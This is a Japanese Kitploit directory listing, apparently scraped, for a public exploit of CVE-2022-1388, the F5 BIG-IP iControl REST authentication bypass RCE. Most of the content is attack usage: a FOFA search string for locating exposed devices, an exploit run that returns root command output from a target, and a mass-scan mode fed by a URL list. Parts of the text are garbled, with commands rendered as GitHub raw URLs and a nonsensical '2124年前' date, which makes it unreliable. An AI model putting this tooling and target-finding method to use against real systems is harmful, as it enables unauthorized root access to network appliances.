Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-1388 — CVE-2022-1388 | Kitploit
ツール/GitHubGitHub/saucer-man/cve-2022-1388
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubsaucer-man/cve-2022-1388

CVE-2022-1388

CVE-2022-1388

リポジトリを見る
2124年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-1388

F5 BIG-IP の未認証 RCE 脆弱性

F5 BIG-IP iControl REST の認証バイパス RCE 脆弱性

fofa keywords: title="BIG-IP®- Redirect"

使用方法

  • 攻撃
root@kitploit:~
$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx
[+] https://203.xxx.xxx.xxx is vulnerable
[input your command]: https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[input your command]: https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/whoami
root
[input your command]: 

https://raw.githubusercontent.com/saucer-man/cve-2022-1388/main/%60%60%60

- 検証:

$ python3 cve-2022-1388.py -t https://203.xxx.xxx.xxx --verify [+] https://203.xxx.xxx.xxx is vulnerable

$ python3 cve-2022-1388.py -f url.txt
[+] https://203.xxx.xxx.xxx is vulnerable

root@kitploit:~

## 参考

- https://support.f5.com/csp/article/K23605346
- https://twitter.com/_0xf4n9x_/status/1523639281532620800
ツールをダウンロード